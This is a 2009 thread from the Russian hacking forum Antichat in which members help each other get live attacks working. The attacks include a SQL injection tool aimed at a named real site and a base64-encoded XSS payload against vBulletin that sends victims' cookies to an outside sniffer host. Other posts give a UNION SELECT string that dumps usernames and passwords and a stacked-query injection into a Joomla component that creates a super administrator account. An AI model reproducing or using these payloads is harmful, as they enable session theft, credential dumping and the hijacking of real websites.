ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.08.2009, 15:56
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
В 4 сипте у меня на вкладке Бтурфорс аттак метод More1Row неактивен...
fast_in_set.php попробывал , просто так с налету не получилось ,буду думать в чем там дело
php SQL.php http://mirsauni.ru:80/?cid= TABLE_NAME INFORMATION_SCHEMA.TABLES 17
Всем большое спасибо за ответы!!! |
|
|
09.08.2009, 00:27
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Пробуй veryfast.php, его поидее и затачивать не надо.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
09.08.2009, 18:48
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Есть форум...
булка, vBulletin 3.7.1
в нем xss
http://seclists.org/fulldisclosure/2008/Jun/0262.html
делаю так
PHP код:
http://localhost/vBull_3/vBull_3.7.1_/vBulletin%203.7.1/upload/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21pbGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K
в base64, такой код
PHP код:
<script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__2166.gif?"+document.cookie; </script>
все это делается на локалхосте, мну перекидывает
PHP код:
data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc25pZmZlci54YWtuZXQucnUvc21pbGVzL2ltZ19fMjE2Ni5naWY/Iitkb2N1bWVudC5jb29raWU7IDwvc2NyaXB0Pg0K
бегу на сниффер, там только ip и браузер, собственно вопрос, а где куки?  |
|
|
|
09.08.2009, 20:20
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
+union+select+1,2,3,concat_ws(0x3b,id,user,passwor d),5+from+users+limit+n,1
n- номер юзера начиная с нуля
|
|
|
|
09.08.2009, 22:50
|
|
Новичок
Регистрация: 06.02.2008
Сообщений: 8
Провел на форуме:
107530
Репутация:
1
|
|
XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.
<img src="javascript :img = new Image(); img.src='адрес_к_моему_снифферу ';" >
Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается. |
|
|
|
10.08.2009, 00:27
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
SQL
Вообщем такая проблема:
Ввожу этот запрос в MysqlFront все работает создает запись, а если выполняется из кода скрипта то нифига не добавляет, по логам Mysql смотрел запрос проходит как надо но ничего не создает. в чем может проблема быть?
Код:
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `language` WHERE `langValue` IN('a');INSERT INTO`usr`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrator','admin123','1111','adm')# a') AND `sobi2Section` = 'field_opt'
|
|
|
|
10.08.2009, 00:59
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Может быть лучше выложить..этот код php скрипта?
|
|
|
|
10.08.2009, 01:11
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid =26
в поиск ввести
Код:
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Поубирать пробелы надо обяательно
Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.
Код:
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Последний раз редактировалось FAQ666; 10.08.2009 в 10:08..
|
|
|
|
10.08.2009, 03:13
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
Не удалось найти файл, соответствующий указанному идентификатору сессии.
|
|
|
|
10.08.2009, 10:56
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от FAQ666
Вообщем нашел вроде уязвимость в компоненте к джумле _http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
http://site/index.php?option=com_sobi2&sobi2Task=search&Itemid =26
в поиск ввести
Код:
a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
Поубирать пробелы надо обяательно
Но блин такая вот проблема по логам смотрю запрос проходит как надо но невыполняется а если этот запрос на прямую через MySQL-Front запускать то идет за милую душу.
Код:
SELECT GROUP_CONCAT( DISTINCT `langKey` SEPARATOR ' ' ) FROM `jos_sobi2_language` WHERE `langValue` IN('a');INSERT/**/INTO`jos_users`(`id`,`name`,`username`,`password`,`usertype`)VALUES('123','administrtor','admin123','1111','super/**/administrator')#') AND `sobi2Section` = 'field_opt'
mysql_query - выполняет один запрос за раз и не более.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
